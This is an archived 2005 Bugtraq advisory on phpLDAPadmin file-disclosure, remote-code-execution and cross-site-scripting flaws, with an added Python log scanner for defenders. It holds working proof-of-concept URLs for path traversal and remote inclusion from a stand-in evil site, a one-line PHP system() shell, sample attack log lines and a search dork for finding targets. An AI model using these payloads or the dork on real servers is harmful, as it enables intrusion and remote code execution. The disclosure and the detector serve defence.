lists.openwall.net: Open Source and information security mailing list archives
Message-ID: <20050829213504.1041.qmail@securityfocus.com>
Date: 29 Aug 2005 21:35:04 -0000
From: retrogod@...ceposta.it
To: bugtraq@...urityfocus.com
Subject: phpLDAPadmin 0.9.6 - 0.9.7/alpha5 (possibly prior versions) system disclosure,


phpLDAPadmin 0.9.6 - 0.9.7/alpha5 (possibly prior versions) system disclosure,
remote code execution, cross site scripting

software:
author site: http://phpldapadmin.sourceforge.net/
description: phpLDAPadmin is a web-based LDAP client. It provides easy,
anywhere-accessible, multi-language administration for your LDAP server.

If the installation is unpatched and vulnerable, a user can read any file on the target system. Proof of concept:

http://[target]/[path]/phpldapadmin/welcome.php?custom_welcome_page=../../../../../../../../etc/passwd

A user can also execute arbitrary PHP code and system commands by making welcome.php include a remote file:

http://[target]/[path]/phpldapadmin/welcome.php?custom_welcome_page=http://[evil_site]/cmd.gif

where cmd.gif is a file like this (the included file is parsed as PHP regardless of its extension):

<?php system('[some_command]'); ?>
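
As an added example for defenders (not part of the original advisory), the following Python script scans web server access logs for the two request shapes described above: a custom_welcome_page value that traverses out of the web root, and one that points at a remote URL. The log lines are constructed for this example in Apache combined format; the client addresses, host names and timestamps are made up, and the script only looks at requests whose path ends in welcome.php, the script named in the advisory.

```python
"""Flag phpLDAPadmin welcome.php requests whose custom_welcome_page parameter
carries a path-traversal or remote-include payload.

Added example; the sample log lines are constructed, not real traffic.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache "combined" format: ip ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

SCRIPT = "welcome.php"            # vulnerable script named in the advisory
PARAM = "custom_welcome_page"     # vulnerable parameter named in the advisory

# Any URL scheme in the parameter means include() would fetch a remote file.
SCHEME_RE = re.compile(r'^[a-z][a-z0-9+.\-]*://', re.IGNORECASE)

# Constructed sample log (addresses from RFC 5737 documentation ranges).
SAMPLE_LOG = """\
203.0.113.5 - - [29/Aug/2005:21:35:04 +0000] "GET /phpldapadmin/welcome.php?custom_welcome_page=../../../../../../../../etc/passwd HTTP/1.0" 200 1822 "-" "Mozilla/4.0"
203.0.113.5 - - [29/Aug/2005:21:35:09 +0000] "GET /phpldapadmin/welcome.php?custom_welcome_page=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.0" 200 1822 "-" "Mozilla/4.0"
203.0.113.5 - - [29/Aug/2005:21:35:15 +0000] "GET /phpldapadmin/welcome.php?custom_welcome_page=%252e%252e%252fetc%252fpasswd HTTP/1.0" 200 1822 "-" "Mozilla/4.0"
203.0.113.5 - - [29/Aug/2005:21:36:11 +0000] "GET /phpldapadmin/welcome.php?custom_welcome_page=http://attacker.example/cmd.gif HTTP/1.0" 200 311 "-" "Mozilla/4.0"
198.51.100.7 - - [29/Aug/2005:21:40:00 +0000] "GET /phpldapadmin/welcome.php HTTP/1.1" 200 4410 "-" "Mozilla/5.0"
198.51.100.7 - - [29/Aug/2005:21:40:02 +0000] "GET /phpldapadmin/welcome.php?custom_welcome_page=custom_welcome.php HTTP/1.1" 200 4410 "-" "Mozilla/5.0"
198.51.100.9 - - [29/Aug/2005:21:41:00 +0000] "GET /phpldapadmin/tree.php?custom_welcome_page=../etc/passwd HTTP/1.1" 404 210 "-" "Mozilla/5.0"
""".splitlines()


def decode_param(value):
    """Percent-decode repeatedly (bounded) so double-encoded payloads are seen."""
    prev = None
    for _ in range(3):
        if value == prev:
            break
        prev, value = value, unquote(value)
    return value


def classify(value):
    """Return 'remote-include', 'path-traversal' or None for one parameter value."""
    v = decode_param(value).replace("\\", "/")   # treat backslashes as separators
    if SCHEME_RE.match(v):
        return "remote-include"
    segments = v.split("/")
    if ".." in segments or v.startswith("/"):    # climbs out of, or ignores, the base dir
        return "path-traversal"
    return None


def scan_log(lines):
    """Return a finding dict for every suspicious welcome.php request in the log."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                                # not combined-format, skip
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith("/" + SCRIPT):
            continue                                # only the script the advisory names
        # parse_qs decodes once; classify() decodes further if needed.
        for value in parse_qs(parts.query, keep_blank_values=True).get(PARAM, []):
            kind = classify(value)
            if kind:
                findings.append({
                    "ip": m.group("ip"),
                    "time": m.group("time"),
                    "status": int(m.group("status")),
                    "kind": kind,
                    "value": decode_param(value),
                })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['kind']:15} status={f['status']} {f['value']}")
```

On the sample above the script reports four requests from the same client: three traversal attempts (plain, percent-encoded and double-encoded) and one remote include, while the legitimate custom_welcome.php request and the request against a different script are left alone. A 200 status on a flagged request is the case worth escalating, since it means the include most likely succeeded.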

A user can also craft a malicious URL that includes client-side code, which will be
executed in the security context of the victim's browser (cross-site scripting).

googledork: phpLDAPadmin intitle:phpLDAPadmin filetype:php inurl:tree.php | inurl:login.php | inurl:donate.php 

rgod
site: http://rgod.altervista.org
email: retrogod at aliceposta.it

original advisory: http://www.rgod.altervista.org/phpldap.html
